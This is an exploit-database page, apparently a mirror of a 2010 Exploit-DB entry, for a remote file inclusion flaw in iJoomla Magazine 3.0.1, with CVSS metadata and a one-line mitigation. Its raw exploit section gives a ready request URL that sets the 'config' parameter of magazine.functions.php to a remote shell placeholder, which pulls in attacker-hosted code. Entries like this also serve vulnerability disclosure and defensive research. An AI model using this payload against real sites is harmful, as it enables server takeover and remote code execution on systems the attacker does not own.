header-logo
Suggest Exploit
vendor:
iJoomla Magazine
by:
LoSt.HaCkEr, aDaM_TRoJaN
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: iJoomla Magazine
Affected Version From: v 3.0.1
Affected Version To: v 3.0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP
2010

iJoomla.Magazine.v.3.0.1 Remote File Inclusion

This exploit allows remote file inclusion in iJoomla Magazine version 3.0.1. By manipulating the 'config' parameter in the 'magazine.functions.php' file, an attacker can include a malicious file (SHeLL) from a remote server.

Mitigation:

Apply the necessary patches or updates provided by the vendor.
Source

Exploit-DB raw data:

# Exploit Title: [iJoomla.Magazine.v.3.0.1 Remote File Inclusion ] 
# Date: [5-9-2010] 
# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
# Software Link: [http://www.ijoomla.com/ijoomla-magazine/ijoomla-magazine/index/] 
# Version: [v 3.0.1 ] 
# Tested on: [Windows XP] 
# CVE : Hacker town of Musayyib
# Contact: LoSt.HaCkEr[at]yahoo[dot]com ~0r~ aDaM_TRoJaN@yahoo.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit: http://iJoomla.Magazine.v.3.0.1-_TKT_/com_magazine_3_0_1/magazine.functions.php?config=[SHeLL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[~] 
Greetings:  No

Navigation

Suggest Exploit

Services By CQR